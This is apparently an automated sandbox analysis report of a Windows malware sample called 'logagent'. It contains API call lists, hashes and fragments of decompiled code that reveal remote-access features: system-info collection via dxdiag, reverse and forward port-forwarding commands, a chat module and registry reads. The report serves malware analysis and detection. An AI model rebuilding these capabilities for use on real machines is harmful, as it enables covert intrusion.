                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                  • ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                  • CloseHandle.KERNEL32(?), ref: 0040F0D2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F116
                                  • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(0000006F), ref: 0040F12E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F137
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F140
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F149
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@std@@@std@@$?c_str@?$basic_string@V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_ofstream@??6std@@?close@?$basic_ofstream@?is_open@?$basic_ofstream@CloseD?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteExecuteFileHandleObjectShellSingleV01@@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                  • String ID: <$@$Temp
                                  • API String ID: 2271834883-1032778388
                                  • Opcode ID: 0bb756f04ec852ca9f70d86688fd5c8a6b6d0147ae2a435f08fc0feeedc541d8
                                  • Instruction ID: 888aea03b1af4e5dcc25ad03cf8797eeef26072084273f227dd45585e2e759a8
                                  • Opcode Fuzzy Hash: 0bb756f04ec852ca9f70d86688fd5c8a6b6d0147ae2a435f08fc0feeedc541d8
                                  • Instruction Fuzzy Hash: E541407190061DEBDB10EFE0DC4AAEE7B79EF44701F10403AF502A6190DBB45A89CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _wgetenv.MSVCRT ref: 0040E93E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,00000000), ref: 0040E949
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040E954
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E95F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,/t ,?,00000000,00000000), ref: 0040E976
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000), ref: 0040E980
                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,?,00000000), ref: 0040E992
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000,00000000), ref: 0040E99B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000), ref: 0040E9A8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000000,00000000), ref: 0040E9B7
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • Sleep.KERNEL32(00000064,00000000,00000000), ref: 0040E9C7
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9D1
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9E6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040E9F7
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040E9FE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040EA3C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040EA46
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000097,?,?,?,?,?,?), ref: 0040EA5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA77
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA80
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@std@@$G@2@@std@@$??1?$basic_string@D@2@@std@@$Hstd@@V?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@?empty@?$basic_string@D@2@@0@FileG@2@@0@V10@0@$CreateD@1@@DeleteExecuteG@1@@ShellSleepV10@V10@@_wgetenv
                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                  • API String ID: 1966616101-2001430897
                                  • Opcode ID: ce698958a3cf0e2d1967a24bbb5560a51b0c83640b614f5b2e78decf375a99d8
                                  • Instruction ID: 1c5eb7ae2d6a6dc7204c520a9e58a8966c6b8e2557f2cc0bdb06ecab60d4e380
                                  • Opcode Fuzzy Hash: ce698958a3cf0e2d1967a24bbb5560a51b0c83640b614f5b2e78decf375a99d8
                                  • Instruction Fuzzy Hash: 0D41657280050DEFCB04EBE0ED4ADEEB77CEE54345B10402AF912A3091EB755A49CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A383
                                  • SetEvent.KERNEL32(?), ref: 0040A38C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A395
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 0040A3AD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040A3BE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A3CD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • inet_ntoa.WS2_32 ref: 0040A41B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A42E
                                  • atoi.MSVCRT ref: 0040A435
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A472
                                  • atoi.MSVCRT ref: 0040A479
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040A4A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A544
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415B18), ref: 0040A56E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415B18), ref: 0040A578
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415908), ref: 0040A5AB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415908), ref: 0040A5B5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000085,?,?,?,?,0041B310,00415908), ref: 0040A5CC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5DD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@V01@@$?c_str@?$basic_string@D@2@@0@Hstd@@V?$basic_string@$?length@?$basic_string@V12@$?substr@?$basic_string@V10@V10@0@atoi$??4?$basic_string@?find@?$basic_string@D@1@@EventV01@inet_ntoa
                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                  • API String ID: 4095635200-168337528
                                  • Opcode ID: fc9eb7c58b601807de47904f8d6b00863ecaf7f63de5754c651c9bbc25c37179
                                  • Instruction ID: b25c6e2405df25c2c81854c085642773db686a1d66d7f735eb38a539f85e00a7
                                  • Opcode Fuzzy Hash: fc9eb7c58b601807de47904f8d6b00863ecaf7f63de5754c651c9bbc25c37179
                                  • Instruction Fuzzy Hash: 3C61A371900309ABDB08BBB1EC4A9EE3B78FB54305F00853AF512A31E1EB78555487AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 34%
                                  			E0040295E(void* __eflags, intOrPtr _a4, char _a7) {
                                  				char _v5;
                                  				void* _v12;
                                  				char _v28;
                                  				void* _v44;
                                  				char _v60;
                                  				char _v76;
                                  				char _v92;
                                  				struct tagMSG _v120;
                                  				int _t29;
                                  				void* _t35;
                                  				intOrPtr _t41;
                                  				void* _t45;
                                  				void* _t50;
                                  				void* _t51;
                                  				void* _t62;
                                  				void* _t63;
                                  				intOrPtr _t95;
                                  				void* _t97;
                                  				void* _t101;
                                  				void* _t104;
                                  				void* _t105;
                                  				void* _t107;
                                  
                                  				_t107 = __eflags;
                                  				_t95 = _a4;
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t95 + 0x18);
                                  				_t29 = SetEvent( *(_t95 + 0x28));
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(_t107,  &_v28,  &_v76, 0x41b310,  &_v76, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                  				_t104 = _t101 + 0x24;
                                  				_t97 =  *_t29 - 0x3a;
                                  				if(_t97 == 0) {
                                  					_t35 = E0040180C( &_v28, __eflags, 0);
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					_t62 = E00406DD9(_t35);
                                  					__eflags = _t62;
                                  					if(_t62 == 0) {
                                  						L12:
                                  						E004017DD( &_v28);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__eflags = 0;
                                  						return 0;
                                  					}
                                  					 *0x41b794 = E00407033(_t62, "DisplayMessage");
                                  					 *0x41b798 = E00407033(_t62, "GetMessage");
                                  					_t41 = E00407033(_t62, "CloseChat");
                                  					_t105 = _t104 + 8;
                                  					 *0x41b79c = _t41;
                                  					 *0x41b790 = 1;
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  					E004020C2(_t95, 0x74, 0x41b738);
                                  					L10:
                                  					_t63 = HeapCreate(0, 0, 0);
                                  					_t45 =  *0x41b798(_t63,  &_v12);
                                  					__eflags = _t45;
                                  					if(_t45 != 0) {
                                  						_t105 = _t105 - 0x10;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t45,  &_v5);
                                  						E004020C2(_t95, 0x3b, _v12);
                                  						HeapFree(_t63, 0, _v12);
                                  					}
                                  					goto L10;
                                  				}
                                  				_t109 = _t97 != 1;
                                  				if(_t97 != 1) {
                                  					goto L12;
                                  				}
                                  				_t50 = E00412881( &_v92);
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_v92, E0040180C( &_v28, _t109, 0));
                                  				_t51 =  *0x41b794(_t50);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				if(_t51 == 0) {
                                  					goto L12;
                                  				}
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_a7);
                                  				E00412855( &_v60, _t104 - 0x10,  &_v60);
                                  				E004020C2(_t95, 0x3b, 0x41576c);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				L4:
                                  				while(GetMessageA( &_v120, 0, 0, 0) <= 0) {
                                  					if(__eflags >= 0) {
                                  						goto L12;
                                  					}
                                  				}
                                  				TranslateMessage( &_v120);
                                  				DispatchMessageA( &_v120);
                                  				goto L4;
                                  			}

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402971
                                  • SetEvent.KERNEL32(?), ref: 0040297A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402983
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 0040299B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004029AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004029BA
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004029F5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402A08
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041576C,?), ref: 00402A22
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000003B), ref: 00402A45
                                  • GetMessageA.USER32 ref: 00402A52
                                  • TranslateMessage.USER32(?), ref: 00402A60
                                  • DispatchMessageA.USER32 ref: 00402A6A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402A87
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B738,00000000,DisplayMessage), ref: 00402ADF
                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00402AF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00402B17
                                  • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 00402B2B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B3E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B47
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$V01@@$?c_str@?$basic_string@?length@?$basic_string@$D@1@@MessageV12@$?substr@?$basic_string@G@1@@Heap$??2@??3@??4?$basic_string@?find@?$basic_string@CreateDispatchEventFreeTranslateV01@
                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                  • API String ID: 1701728818-749203953
                                  • Opcode ID: 05f6091bb8e4fb570316d0bc2ae79ecd824646f3970f9e54cc59898a20bb853e
                                  • Instruction ID: 706d1787dbe5d31282a01ee588047493408fae45c62342a208237384888500fd
                                  • Opcode Fuzzy Hash: 05f6091bb8e4fb570316d0bc2ae79ecd824646f3970f9e54cc59898a20bb853e
                                  • Instruction Fuzzy Hash: 75517F72A00608EBCB14ABE1ED4D9EE7B7CEF84355B10403AF502E31D1DBB85545CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 34%
                                  			E0040BE34(char _a4, short* _a20, intOrPtr _a24, char _a27) {
                                  				void* _v8;
                                  				char _v24;
                                  				char _v40;
                                  				char _v56;
                                  				char _v72;
                                  				char _v88;
                                  				char _v104;
                                  				char _v120;
                                  				char _v136;
                                  				char _v152;
                                  				void* _t28;
                                  				long _t29;
                                  				void* _t35;
                                  				char* _t38;
                                  				char* _t39;
                                  				char* _t40;
                                  				char* _t41;
                                  				char* _t42;
                                  				char* _t43;
                                  				char* _t44;
                                  				void* _t54;
                                  				void* _t56;
                                  				char* _t73;
                                  				void* _t77;
                                  				void* _t79;
                                  
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				_t28 = E0040BD9B( &_a4);
                                  				_t79 = _t77 - 0x10 + 0x10;
                                  				_t47 = 0;
                                  				_t29 = RegOpenKeyExW(_t28, _a20, 0, 0x20019,  &_v8);
                                  				_t90 = _t29;
                                  				if(_t29 != 0) {
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                  					E004020C2(0x41bde0, 0x72, "3");
                                  				} else {
                                  					E0040BB20( &_v8, _t90, _v8);
                                  					_pop(_t54);
                                  					_t73 = "0";
                                  					if(_a24 != 0) {
                                  						_t73 = "1";
                                  					}
